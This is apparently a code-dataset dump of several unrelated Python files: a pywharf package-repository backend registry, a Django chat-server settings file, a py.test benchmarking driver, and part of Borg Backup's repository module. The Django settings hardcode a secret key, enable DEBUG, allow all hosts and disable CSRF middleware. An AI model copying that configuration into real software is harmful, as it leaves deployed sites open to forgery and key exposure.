class PkgRepo(BaseModel):
type: str
config: PkgRepoConfig
secret: PkgRepoSecret
local_paths: LocalPaths
@abstractmethod
def record_error(self, error_message: str) -> None:
pass
@abstractmethod
def ready(self) -> Tuple[bool, str]:
pass
@abstractmethod
def auth_read(self) -> bool:
pass
@abstractmethod
def auth_write(self) -> bool:
pass
@abstractmethod
def upload_package(self, filename: str, meta: Dict[str, str], path: str) -> UploadPackageResult:
pass
@abstractmethod
def collect_all_published_packages(self) -> List[PkgRef]:
pass
@abstractmethod
def local_index_is_up_to_date(self, path: str) -> bool:
pass
@abstractmethod
def upload_index(self, path: str) -> UploadIndexResult:
pass
@abstractmethod
def download_index(self, path: str) -> DownloadIndexResult:
pass
class BackendRegistration:
type: str = ''
pkg_repo_config_cls: Type[PkgRepoConfig] = PkgRepoConfig
pkg_repo_secret_cls: Type[PkgRepoSecret] = PkgRepoSecret
pkg_repo_cls: Type[PkgRepo] = PkgRepo
pkg_ref_cls: Type[PkgRef] = PkgRef
cli_name_to_func: Dict[str, Callable[[], int]] = {}
######################
# Backend reflection #
######################
class BackendInstanceManager:
def __init__(self) -> None:
self._type_to_registration: Dict[str, Type[BackendRegistration]] = {}
# Namespace package root.
root_module = importlib.import_module('.', 'pywharf_backends')
# Find all submodules.
for module_info in pkgutil.iter_modules(
root_module.__path__, # type: ignore
root_module.__name__ + '.',
):
# Load module.
module = importlib.import_module(module_info.name)
# Find the registration class.
registration = None
for obj in module.__dict__.values():
if inspect.isclass(obj) \
and issubclass(obj, BackendRegistration) and obj is not BackendRegistration:
registration = obj
if registration is None:
continue
# Type validation.
assert issubclass(registration, BackendRegistration)
assert registration.type
assert issubclass(registration.pkg_repo_config_cls, PkgRepoConfig) \
and registration.pkg_repo_config_cls is not PkgRepoConfig
assert issubclass(registration.pkg_repo_secret_cls, PkgRepoSecret) \
and registration.pkg_repo_secret_cls is not PkgRepoSecret
assert issubclass(registration.pkg_repo_cls, PkgRepo) \
and registration.pkg_repo_cls is not PkgRepo
assert issubclass(registration.pkg_ref_cls, PkgRef) \
and registration.pkg_ref_cls is not PkgRef
self._type_to_registration[registration.type] = registration
@property
def all_registrations(self) -> Iterable[Type[BackendRegistration]]:
return self._type_to_registration.values()
def _registration(self, **kwargs) -> Type[BackendRegistration]:
assert 'type' in kwargs
assert kwargs['type'] in self._type_to_registration
return self._type_to_registration[kwargs['type']]
def create_pkg_repo_config(self, **kwargs) -> PkgRepoConfig:
return self._registration(**kwargs).pkg_repo_config_cls(**kwargs)
def create_pkg_repo_secret(self, **kwargs) -> PkgRepoSecret:
name = kwargs.get('name')
type_ = kwargs.get('type')
if not name or not type_:
raise ValueError(f'name or type not set. kwargs={kwargs}')
raw = kwargs.get('raw')
env = kwargs.get('env')
if not raw and not env:
raise ValueError(f'Should provide raw or env. kwargs={kwargs}')
if raw and env:
raise ValueError(f'Can either set raw or env, but not both. kwargs={kwargs}')
struct = {'name': name, 'type': type_}
if raw:
            # Hardcoded secret.
struct['raw'] = raw
else:
# Load from the environment variable.
assert env
raw_from_env = os.getenv(env)
if not raw_from_env:
raise ValueError(f'{env} is not set. name={name}, struct={struct}')
struct['raw'] = raw_from_env
return self._registration(type=type_).pkg_repo_secret_cls(**struct)
def create_pkg_repo(self, **kwargs) -> PkgRepo:
return self._registration(**kwargs).pkg_repo_cls(**kwargs)
def create_pkg_ref(self, **kwargs) -> PkgRef:
return self._registration(**kwargs).pkg_ref_cls(**kwargs)
def load_pkg_repo_configs(self, path: str) -> Dict[str, PkgRepoConfig]:
name_to_pkg_repo_config: Dict[str, PkgRepoConfig] = {}
for name, struct in read_toml(path).items():
if not isinstance(struct, dict):
raise ValueError(f'Invalid pkg_repo_config, name={name}, struct={struct}')
name = name.lower()
config = self.create_pkg_repo_config(name=name, **struct)
name_to_pkg_repo_config[name] = config
return name_to_pkg_repo_config
@staticmethod
def dump_pkg_repo_configs(path: str, pkg_repo_configs: Iterable[PkgRepoConfig]) -> None:
dump = {}
for pkg_repo_config in pkg_repo_configs:
struct = pkg_repo_config.dict()
name = struct.pop('name')
name = name.lower()
dump[name] = struct
write_toml(path, dump)
def load_pkg_repo_secrets(self, path: str) -> Dict[str, PkgRepoSecret]:
name_to_pkg_repo_secret: Dict[str, PkgRepoSecret] = {}
for name, struct in read_toml(path).items():
if not isinstance(struct, dict):
raise ValueError(f'Invalid pkg_repo_secret, name={name}, struct={struct}')
secret = self.create_pkg_repo_secret(name=name, **struct)
name_to_pkg_repo_secret[name] = secret
return name_to_pkg_repo_secret
@staticmethod
def dump_pkg_repo_secrets(
path: str,
pkg_repo_secrets: Iterable[PkgRepoSecret],
name_to_env: Optional[Dict[str, str]] = None,
) -> None:
dump = {}
for pkg_repo_config in pkg_repo_secrets:
struct = pkg_repo_config.dict()
name = struct['name'].lower()
dump_struct = {'type': struct['type']}
if not name_to_env:
dump_struct['raw'] = struct['raw']
else:
assert name in name_to_env
dump_struct['env'] = name_to_env[name]
dump[name] = dump_struct
write_toml(path, dump)
def load_pkg_refs_and_mtime(self, path: str) -> Tuple[List[PkgRef], int]:
struct = read_toml(path)
pkg_refs = [self.create_pkg_ref(**struct_pkg_ref) for struct_pkg_ref in struct['pkgs']]
mtime = struct['mtime']
return pkg_refs, mtime
@staticmethod
def dump_pkg_refs_and_mtime(path: str, pkg_refs: Iterable[PkgRef]) -> None:
struct = {
'pkgs': [pkg_ref.dict() for pkg_ref in pkg_refs],
'mtime': now_timestamp(),
}
write_toml(path, struct)
##########
# Helper #
##########
def basic_model_get_default(basic_model_cls: BaseModel, key: str):
assert key in basic_model_cls.__fields__
return basic_model_cls.__fields__[key].default
_METHOD = TypeVar('_METHOD')
def record_error_if_raises(method: _METHOD) -> _METHOD:
@functools.wraps(method)
def decorated(self, *args, **kwargs):
try:
ret = method(self, *args, **kwargs)
return ret
except Exception:
self.record_error(traceback.format_exc())
raise
return decorated
class PkgRepoIndex:
def __init__(self, pkg_refs: List[PkgRef], mtime: int) -> None:
self._mtime = mtime
self._distrib_to_pkg_refs: Dict[str, List[PkgRef]] = {}
self._package_to_pkg_ref: Dict[str, PkgRef] = {}
for pkg_ref in pkg_refs:
self.add_pkg_ref(pkg_ref)
@property
def mtime(self) -> int:
return self._mtime
@property
def all_distributions(self) -> Iterable[str]:
return self._distrib_to_pkg_refs.keys()
def add_pkg_ref(self, pkg_ref: PkgRef) -> None:
if pkg_ref.package in self._package_to_pkg_ref:
raise KeyError(f'package={pkg_ref.package} duplicated.')
if pkg_ref.distrib not in self._distrib_to_pkg_refs:
self._distrib_to_pkg_refs[pkg_ref.distrib] = []
self._distrib_to_pkg_refs[pkg_ref.distrib].append(pkg_ref)
self._package_to_pkg_ref[pkg_ref.package] = pkg_ref
def get_pkg_refs(self, query_distrib: str) -> Optional[List[PkgRef]]:
distrib = normalize_distribution_name(query_distrib)
return self._distrib_to_pkg_refs.get(distrib)
def get_single_pkg_ref(self, query_distrib: str, query_package: str) -> Optional[PkgRef]:
pkg_ref = self._package_to_pkg_ref.get(query_package)
if pkg_ref is None or normalize_distribution_name(query_distrib) != pkg_ref.distrib:
return None
return pkg_ref
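# Illustrative sketch (not part of the original module): how PkgRepoIndex groups
# package references by normalized distribution name. The "demo" backend type,
# the wheel file name and the zeroed sha256 are made up for the example.
if __name__ == '__main__':
    class _DemoPkgRef(PkgRef):
        def auth_url(self, config: PkgRepoConfig, secret: PkgRepoSecret) -> str:
            return 'https://example.invalid/' + self.package
    ref = _DemoPkgRef(
        type='demo',
        distrib=normalize_distribution_name('My.Pkg'),
        package='my_pkg-1.0-py3-none-any.whl',
        ext='whl',
        sha256='0' * 64,
        meta={},
    )
    index = PkgRepoIndex([ref], mtime=now_timestamp())
    # Both the stored distrib and the query pass through
    # normalize_distribution_name(), so naming variants resolve consistently.
    assert index.get_pkg_refs('My.Pkg') == [ref]
    assert index.get_single_pkg_ref('My.Pkg', 'my_pkg-1.0-py3-none-any.whl') is ref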
|
py | 7dfa923f723d7f2118a49f3a149e608af3cb25a0 | """
Django settings for server project.
Generated by 'django-admin startproject' using Django 2.1.7.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '$(_bts_5if59ns1(7u2!opjy*+3^+pwf_rr8=rm0o8ih+ts9xl'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['*']
from django_eventstream.utils import have_channels
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
if have_channels():
INSTALLED_APPS.append('channels')
INSTALLED_APPS.extend([
'django_eventstream',
'chat',
])
MIDDLEWARE = [
'django_grip.GripMiddleware',
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
#'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'server.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'server.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {}
import dj_database_url
DATABASES['default'] = dj_database_url.config(default='sqlite:///db.sqlite3')
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = 'staticfiles'
ASGI_APPLICATION = 'server.routing.application'
GRIP_URL = os.environ.get('GRIP_URL')
EVENTSTREAM_STORAGE_CLASS = 'django_eventstream.storage.DjangoModelStorage'
|
py | 7dfa92949aac0aa05e8af4866b3c7bffb2046456 | """benchmarking through py.test"""
import py
from py.__.test.item import Item
from py.__.test.terminal.terminal import TerminalSession
from math import ceil, floor, log10
from time import time
import timeit
from inspect import getsource
# from IPython.Magic.magic_timeit
#units = ["s", "ms", "\xc2\xb5s", "ns"]
units = ["s", "ms", "us", "ns"]
scaling = [1, 1e3, 1e6, 1e9]
unitn = dict((s,i) for i,s in enumerate(units))
precision = 3
# like py.test Directory but scans for 'bench_<smth>.py'
class Directory(py.test.collect.Directory):
def filefilter(self, path):
b = path.purebasename
ext = path.ext
return b.startswith('bench_') and ext == '.py'
# like py.test Module but scans for 'bench_<smth>' and 'timeit_<smth>'
class Module(py.test.collect.Module):
def funcnamefilter(self, name):
return name.startswith('bench_') or name.startswith('timeit_')
# Function level benchmarking driver
class Timer(timeit.Timer):
def __init__(self, stmt, setup='pass', timer=timeit.default_timer, globals=globals()):
# copy of timeit.Timer.__init__
# similarity index 95%
self.timer = timer
stmt = timeit.reindent(stmt, 8)
setup = timeit.reindent(setup, 4)
src = timeit.template % {'stmt': stmt, 'setup': setup}
self.src = src # Save for traceback display
code = compile(src, timeit.dummy_src_name, "exec")
ns = {}
#exec code in globals(), ns -- original timeit code
exec code in globals, ns # -- we use caller-provided globals instead
self.inner = ns["inner"]
class Function(py.__.test.item.Function):
def __init__(self, *args, **kw):
super(Function, self).__init__(*args, **kw)
self.benchtime = None
self.benchtitle = None
def execute(self, target, *args):
# get func source without first 'def func(...):' line
src = getsource(target)
src = '\n'.join( src.splitlines()[1:] )
# extract benchmark title
if target.func_doc is not None:
self.benchtitle = target.func_doc
else:
self.benchtitle = src.splitlines()[0].strip()
# XXX we ignore args
timer = Timer(src, globals=target.func_globals)
if self.name.startswith('timeit_'):
# from IPython.Magic.magic_timeit
repeat = 3
number = 1
for i in range(1,10):
t = timer.timeit(number)
if t >= 0.2:
number *= (0.2 / t)
number = int(ceil(number))
break
if t <= 0.02:
# we are not close enough to that 0.2s
number *= 10
else:
# since we are very close to be > 0.2s we'd better adjust number
# so that timing time is not too high
number *= (0.2 / t)
number = int(ceil(number))
break
self.benchtime = min(timer.repeat(repeat, number)) / number
# 'bench_<smth>'
else:
self.benchtime = timer.timeit(1)
class BenchSession(TerminalSession):
def header(self, colitems):
#self.out.sep("-", "benchmarking starts")
super(BenchSession, self).header(colitems)
def footer(self, colitems):
super(BenchSession, self).footer(colitems)
#self.out.sep("-", "benchmarking ends")
self.out.write('\n')
self.print_bench_results()
def print_bench_results(self):
self.out.write('==============================\n')
self.out.write(' *** BENCHMARKING RESULTS *** \n')
self.out.write('==============================\n')
self.out.write('\n')
# benchname, time, benchtitle
results = []
for item, outcome in self._memo:
if isinstance(item, Item):
best = item.benchtime
if best is None:
# skipped or failed benchmarks
tstr = '---'
else:
# from IPython.Magic.magic_timeit
if best > 0.0:
order = min(-int(floor(log10(best)) // 3), 3)
else:
order = 3
tstr = "%.*g %s" % (precision, best * scaling[order], units[order])
results.append( [item.name, tstr, item.benchtitle] )
# dot/unit align second column
# FIXME simpler? this is crappy -- shame on me...
wm = [0]*len(units)
we = [0]*len(units)
for s in results:
tstr = s[1]
n,u = tstr.split()
# unit n
un = unitn[u]
try:
m,e = n.split('.')
except ValueError:
m,e = n,''
wm[un] = max(len(m), wm[un])
we[un] = max(len(e), we[un])
for s in results:
tstr = s[1]
n,u = tstr.split()
un = unitn[u]
try:
m,e = n.split('.')
except ValueError:
m,e = n,''
m = m.rjust(wm[un])
e = e.ljust(we[un])
if e.strip():
n = '.'.join((m,e))
else:
n = ' '.join((m,e))
# let's put the number into the right place
txt = ''
for i in range(len(units)):
if i == un:
txt += n
else:
txt += ' '*(wm[i]+we[i]+1)
s[1] = '%s %s' % (txt, u)
# align all columns besides the last one
for i in range(2):
w = max(len(s[i]) for s in results)
for s in results:
s[i] = s[i].ljust(w)
# show results
for s in results:
self.out.write('%s | %s | %s\n' % tuple(s))
def main(args=None):
# hook our Directory/Module/Function as defaults
from py.__.test import defaultconftest
defaultconftest.Directory = Directory
defaultconftest.Module = Module
defaultconftest.Function = Function
# hook BenchSession as py.test session
config = py.test.config
config._getsessionclass = lambda : BenchSession
py.test.cmdline.main(args)
|
py | 7dfa9317b61e8b492dde417cf8515ccbfae9a142 | import errno
import mmap
import os
import shutil
import stat
import struct
import time
from binascii import hexlify, unhexlify
from collections import defaultdict
from configparser import ConfigParser
from datetime import datetime
from functools import partial
from itertools import islice
from .constants import * # NOQA
from .hashindex import NSIndex
from .helpers import Error, ErrorWithTraceback, IntegrityError, format_file_size, parse_file_size
from .helpers import Location
from .helpers import ProgressIndicatorPercent
from .helpers import bin_to_hex
from .helpers import hostname_is_unique
from .helpers import secure_erase, truncate_and_unlink
from .helpers import msgpack
from .locking import Lock, LockError, LockErrorT
from .logger import create_logger
from .lrucache import LRUCache
from .platform import SaveFile, SyncFile, sync_dir, safe_fadvise
from .algorithms.checksums import crc32
from .crypto.file_integrity import IntegrityCheckedFile, FileIntegrityError
logger = create_logger(__name__)
MAGIC = b'BORG_SEG'
MAGIC_LEN = len(MAGIC)
ATTIC_MAGIC = b'ATTICSEG'
assert len(ATTIC_MAGIC) == MAGIC_LEN
TAG_PUT = 0
TAG_DELETE = 1
TAG_COMMIT = 2
FreeSpace = partial(defaultdict, int)
class Repository:
"""
Filesystem based transactional key value store
Transactionality is achieved by using a log (aka journal) to record changes. The log is a series of numbered files
called segments. Each segment is a series of log entries. The segment number together with the offset of each
entry relative to its segment start establishes an ordering of the log entries. This is the "definition" of
time for the purposes of the log.
Log entries are either PUT, DELETE or COMMIT.
A COMMIT is always the final log entry in a segment and marks all data from the beginning of the log until the
segment ending with the COMMIT as committed and consistent. The segment number of a segment ending with a COMMIT
is called the transaction ID of that commit, and a segment ending with a COMMIT is called committed.
When reading from a repository it is first checked whether the last segment is committed. If it is not, then
all segments after the last committed segment are deleted; they contain log entries whose consistency is not
established by a COMMIT.
Note that the COMMIT can't establish consistency by itself, but only manages to do so with proper support from
the platform (including the hardware). See platform.base.SyncFile for details.
A PUT inserts a key-value pair. The value is stored in the log entry, hence the repository implements
full data logging, meaning that all data is consistent, not just metadata (which is common in file systems).
A DELETE marks a key as deleted.
For a given key only the last entry regarding the key, which is called current (all other entries are called
superseded), is relevant: If there is no entry or the last entry is a DELETE then the key does not exist.
Otherwise the last PUT defines the value of the key.
By superseding a PUT (with either another PUT or a DELETE) the log entry becomes obsolete. A segment containing
such obsolete entries is called sparse, while a segment containing no such entries is called compact.
Sparse segments can be compacted and thereby disk space freed. This destroys the transaction for which the
    superseded entries were current.
On disk layout:
dir/README
dir/config
dir/data/<X // SEGMENTS_PER_DIR>/<X>
dir/index.X
dir/hints.X
File system interaction
-----------------------
LoggedIO generally tries to rely on common behaviours across transactional file systems.
Segments that are deleted are truncated first, which avoids problems if the FS needs to
allocate space to delete the dirent of the segment. This mostly affects CoW file systems,
traditional journaling file systems have a fairly good grip on this problem.
Note that deletion, i.e. unlink(2), is atomic on every file system that uses inode reference
counts, which includes pretty much all of them. To remove a dirent the inode's refcount has
to be decreased, but you can't decrease the refcount before removing the dirent nor can you
decrease the refcount after removing the dirent. File systems solve this with a lock,
and by ensuring it all stays within the same FS transaction.
Truncation is generally not atomic in itself, and combining truncate(2) and unlink(2) is of
course never guaranteed to be atomic. Truncation in a classic extent-based FS is done in
roughly two phases, first the extents are removed then the inode is updated. (In practice
this is of course way more complex).
LoggedIO gracefully handles truncate/unlink splits as long as the truncate resulted in
a zero length file. Zero length segments are considered to not exist, while LoggedIO.cleanup()
will still get rid of them.
"""
class DoesNotExist(Error):
"""Repository {} does not exist."""
class AlreadyExists(Error):
"""A repository already exists at {}."""
class PathAlreadyExists(Error):
"""There is already something at {}."""
class ParentPathDoesNotExist(Error):
"""The parent path of the repo directory [{}] does not exist."""
class InvalidRepository(Error):
"""{} is not a valid repository. Check repo config."""
class InvalidRepositoryConfig(Error):
"""{} does not have a valid configuration. Check repo config [{}]."""
class AtticRepository(Error):
"""Attic repository detected. Please run "borg upgrade {}"."""
class CheckNeeded(ErrorWithTraceback):
"""Inconsistency detected. Please run "borg check {}"."""
class ObjectNotFound(ErrorWithTraceback):
"""Object with key {} not found in repository {}."""
def __init__(self, id, repo):
if isinstance(id, bytes):
id = bin_to_hex(id)
super().__init__(id, repo)
class InsufficientFreeSpaceError(Error):
"""Insufficient free space to complete transaction (required: {}, available: {})."""
class StorageQuotaExceeded(Error):
"""The storage quota ({}) has been exceeded ({}). Try deleting some archives."""
def __init__(self, path, create=False, exclusive=False, lock_wait=None, lock=True,
append_only=False, storage_quota=None, check_segment_magic=True,
make_parent_dirs=False):
self.path = os.path.abspath(path)
self._location = Location('file://%s' % self.path)
self.io = None # type: LoggedIO
self.lock = None
self.index = None
# This is an index of shadowed log entries during this transaction. Consider the following sequence:
# segment_n PUT A, segment_x DELETE A
# After the "DELETE A" in segment_x the shadow index will contain "A -> [n]".
self.shadow_index = {}
self._active_txn = False
self.lock_wait = lock_wait
self.do_lock = lock
self.do_create = create
self.created = False
self.exclusive = exclusive
self.append_only = append_only
self.storage_quota = storage_quota
self.storage_quota_use = 0
self.transaction_doomed = None
self.check_segment_magic = check_segment_magic
self.make_parent_dirs = make_parent_dirs
def __del__(self):
if self.lock:
self.close()
assert False, "cleanup happened in Repository.__del__"
def __repr__(self):
return '<%s %s>' % (self.__class__.__name__, self.path)
def __enter__(self):
if self.do_create:
self.do_create = False
self.create(self.path)
self.created = True
self.open(self.path, bool(self.exclusive), lock_wait=self.lock_wait, lock=self.do_lock)
return self
def __exit__(self, exc_type, exc_val, exc_tb):
if exc_type is not None:
no_space_left_on_device = exc_type is OSError and exc_val.errno == errno.ENOSPC
# The ENOSPC could have originated somewhere else besides the Repository. The cleanup is always safe, unless
# EIO or FS corruption ensues, which is why we specifically check for ENOSPC.
if self._active_txn and no_space_left_on_device:
logger.warning('No space left on device, cleaning up partial transaction to free space.')
cleanup = True
else:
cleanup = False
self._rollback(cleanup=cleanup)
self.close()
@property
def id_str(self):
return bin_to_hex(self.id)
@staticmethod
def is_repository(path):
"""Check whether there is already a Borg repository at *path*."""
try:
# Use binary mode to avoid troubles if a README contains some stuff not in our locale
with open(os.path.join(path, 'README'), 'rb') as fd:
# Read only the first ~100 bytes (if any), in case some README file we stumble upon is large.
readme_head = fd.read(100)
# The first comparison captures our current variant (REPOSITORY_README), the second comparison
# is an older variant of the README file (used by 1.0.x).
return b'Borg Backup repository' in readme_head or b'Borg repository' in readme_head
except OSError:
# Ignore FileNotFound, PermissionError, ...
return False
def check_can_create_repository(self, path):
"""
Raise an exception if a repository already exists at *path* or any parent directory.
Checking parent directories is done for two reasons:
(1) It's just a weird thing to do, and usually not intended. A Borg using the "parent" repository
may be confused, or we may accidentally put stuff into the "data/" or "data/<n>/" directories.
(2) When implementing repository quotas (which we currently don't), it's important to prohibit
folks from creating quota-free repositories. Since no one can create a repository within another
repository, users can only use the quota'd repository when their --restrict-to-path points
at the user's repository.
"""
try:
st = os.stat(path)
except FileNotFoundError:
pass # nothing there!
else:
# there is something already there!
if self.is_repository(path):
raise self.AlreadyExists(path)
if not stat.S_ISDIR(st.st_mode) or os.listdir(path):
raise self.PathAlreadyExists(path)
# an empty directory is acceptable for us.
while True:
# Check all parent directories for Borg's repository README
previous_path = path
# Thus, path = previous_path/..
path = os.path.abspath(os.path.join(previous_path, os.pardir))
if path == previous_path:
# We reached the root of the directory hierarchy (/.. = / and C:\.. = C:\).
break
if self.is_repository(path):
raise self.AlreadyExists(path)
def create(self, path):
"""Create a new empty repository at `path`
"""
self.check_can_create_repository(path)
if self.make_parent_dirs:
parent_path = os.path.join(path, os.pardir)
os.makedirs(parent_path, exist_ok=True)
if not os.path.exists(path):
try:
os.mkdir(path)
except FileNotFoundError as err:
raise self.ParentPathDoesNotExist(path) from err
with open(os.path.join(path, 'README'), 'w') as fd:
fd.write(REPOSITORY_README)
os.mkdir(os.path.join(path, 'data'))
config = ConfigParser(interpolation=None)
config.add_section('repository')
config.set('repository', 'version', '1')
config.set('repository', 'segments_per_dir', str(DEFAULT_SEGMENTS_PER_DIR))
config.set('repository', 'max_segment_size', str(DEFAULT_MAX_SEGMENT_SIZE))
config.set('repository', 'append_only', str(int(self.append_only)))
if self.storage_quota:
config.set('repository', 'storage_quota', str(self.storage_quota))
else:
config.set('repository', 'storage_quota', '0')
config.set('repository', 'additional_free_space', '0')
config.set('repository', 'id', bin_to_hex(os.urandom(32)))
self.save_config(path, config)
def save_config(self, path, config):
config_path = os.path.join(path, 'config')
old_config_path = os.path.join(path, 'config.old')
if os.path.isfile(old_config_path):
logger.warning("Old config file not securely erased on previous config update")
secure_erase(old_config_path)
if os.path.isfile(config_path):
link_error_msg = ("Failed to securely erase old repository config file (hardlinks not supported>). "
"Old repokey data, if any, might persist on physical storage.")
try:
os.link(config_path, old_config_path)
except OSError as e:
if e.errno in (errno.EMLINK, errno.ENOSYS, errno.EPERM, errno.EACCES, errno.ENOTSUP, errno.EIO):
logger.warning(link_error_msg)
else:
raise
except AttributeError:
# some python ports have no os.link, see #4901
logger.warning(link_error_msg)
try:
with SaveFile(config_path) as fd:
config.write(fd)
except PermissionError as e:
# error is only a problem if we even had a lock
if self.do_lock:
raise
logger.warning("%s: Failed writing to '%s'. This is expected when working on "
"read-only repositories." % (e.strerror, e.filename))
if os.path.isfile(old_config_path):
secure_erase(old_config_path)
def save_key(self, keydata):
assert self.config
keydata = keydata.decode('utf-8') # remote repo: msgpack issue #99, getting bytes
self.config.set('repository', 'key', keydata)
self.save_config(self.path, self.config)
def load_key(self):
keydata = self.config.get('repository', 'key')
return keydata.encode('utf-8') # remote repo: msgpack issue #99, returning bytes
def get_free_nonce(self):
if self.do_lock and not self.lock.got_exclusive_lock():
raise AssertionError("bug in code, exclusive lock should exist here")
nonce_path = os.path.join(self.path, 'nonce')
try:
with open(nonce_path, 'r') as fd:
return int.from_bytes(unhexlify(fd.read()), byteorder='big')
except FileNotFoundError:
return None
def commit_nonce_reservation(self, next_unreserved, start_nonce):
if self.do_lock and not self.lock.got_exclusive_lock():
raise AssertionError("bug in code, exclusive lock should exist here")
if self.get_free_nonce() != start_nonce:
raise Exception("nonce space reservation with mismatched previous state")
nonce_path = os.path.join(self.path, 'nonce')
try:
with SaveFile(nonce_path, binary=False) as fd:
fd.write(bin_to_hex(next_unreserved.to_bytes(8, byteorder='big')))
except PermissionError as e:
# error is only a problem if we even had a lock
if self.do_lock:
raise
logger.warning("%s: Failed writing to '%s'. This is expected when working on "
"read-only repositories." % (e.strerror, e.filename))
def destroy(self):
"""Destroy the repository at `self.path`
"""
if self.append_only:
raise ValueError(self.path + " is in append-only mode")
self.close()
os.remove(os.path.join(self.path, 'config')) # kill config first
shutil.rmtree(self.path)
def get_index_transaction_id(self):
indices = sorted(int(fn[6:])
for fn in os.listdir(self.path)
if fn.startswith('index.') and fn[6:].isdigit() and os.stat(os.path.join(self.path, fn)).st_size != 0)
if indices:
return indices[-1]
else:
return None
def check_transaction(self):
index_transaction_id = self.get_index_transaction_id()
segments_transaction_id = self.io.get_segments_transaction_id()
if index_transaction_id is not None and segments_transaction_id is None:
# we have a transaction id from the index, but we did not find *any*
# commit in the segment files (thus no segments transaction id).
# this can happen if a lot of segment files are lost, e.g. due to a
# filesystem or hardware malfunction. it means we have no identifiable
# valid (committed) state of the repo which we could use.
msg = '%s" - although likely this is "beyond repair' % self.path # dirty hack
raise self.CheckNeeded(msg)
# Attempt to automatically rebuild index if we crashed between commit
# tag write and index save
if index_transaction_id != segments_transaction_id:
if index_transaction_id is not None and index_transaction_id > segments_transaction_id:
replay_from = None
else:
replay_from = index_transaction_id
self.replay_segments(replay_from, segments_transaction_id)
def get_transaction_id(self):
self.check_transaction()
return self.get_index_transaction_id()
def break_lock(self):
Lock(os.path.join(self.path, 'lock')).break_lock()
def migrate_lock(self, old_id, new_id):
# note: only needed for local repos
if self.lock is not None:
self.lock.migrate_lock(old_id, new_id)
def open(self, path, exclusive, lock_wait=None, lock=True):
self.path = path
try:
st = os.stat(path)
except FileNotFoundError:
raise self.DoesNotExist(path)
if not stat.S_ISDIR(st.st_mode):
raise self.InvalidRepository(path)
if lock:
self.lock = Lock(os.path.join(path, 'lock'), exclusive, timeout=lock_wait, kill_stale_locks=hostname_is_unique()).acquire()
else:
self.lock = None
self.config = ConfigParser(interpolation=None)
try:
with open(os.path.join(self.path, 'config')) as fd:
self.config.read_file(fd)
except FileNotFoundError:
self.close()
raise self.InvalidRepository(self.path)
if 'repository' not in self.config.sections() or self.config.getint('repository', 'version') != 1:
self.close()
raise self.InvalidRepository(path)
self.max_segment_size = parse_file_size(self.config.get('repository', 'max_segment_size'))
if self.max_segment_size >= MAX_SEGMENT_SIZE_LIMIT:
self.close()
raise self.InvalidRepositoryConfig(path, 'max_segment_size >= %d' % MAX_SEGMENT_SIZE_LIMIT) # issue 3592
self.segments_per_dir = self.config.getint('repository', 'segments_per_dir')
self.additional_free_space = parse_file_size(self.config.get('repository', 'additional_free_space', fallback=0))
# append_only can be set in the constructor
# it shouldn't be overridden (True -> False) here
self.append_only = self.append_only or self.config.getboolean('repository', 'append_only', fallback=False)
if self.storage_quota is None:
# self.storage_quota is None => no explicit storage_quota was specified, use repository setting.
self.storage_quota = parse_file_size(self.config.get('repository', 'storage_quota', fallback=0))
self.id = unhexlify(self.config.get('repository', 'id').strip())
self.io = LoggedIO(self.path, self.max_segment_size, self.segments_per_dir)
if self.check_segment_magic:
# read a segment and check whether we are dealing with a non-upgraded Attic repository
segment = self.io.get_latest_segment()
if segment is not None and self.io.get_segment_magic(segment) == ATTIC_MAGIC:
self.close()
raise self.AtticRepository(path)
def close(self):
if self.lock:
if self.io:
self.io.close()
self.io = None
self.lock.release()
self.lock = None
def commit(self, save_space=False):
"""Commit transaction
"""
# save_space is not used anymore, but stays for RPC/API compatibility.
if self.transaction_doomed:
exception = self.transaction_doomed
self.rollback()
raise exception
self.check_free_space()
self.log_storage_quota()
self.io.write_commit()
if not self.append_only:
self.compact_segments()
self.write_index()
self.rollback()
def _read_integrity(self, transaction_id, key):
integrity_file = 'integrity.%d' % transaction_id
integrity_path = os.path.join(self.path, integrity_file)
try:
with open(integrity_path, 'rb') as fd:
integrity = msgpack.unpack(fd)
except FileNotFoundError:
return
if integrity.get(b'version') != 2:
logger.warning('Unknown integrity data version %r in %s', integrity.get(b'version'), integrity_file)
return
return integrity[key].decode()
def open_index(self, transaction_id, auto_recover=True):
if transaction_id is None:
return NSIndex()
index_path = os.path.join(self.path, 'index.%d' % transaction_id)
integrity_data = self._read_integrity(transaction_id, b'index')
try:
with IntegrityCheckedFile(index_path, write=False, integrity_data=integrity_data) as fd:
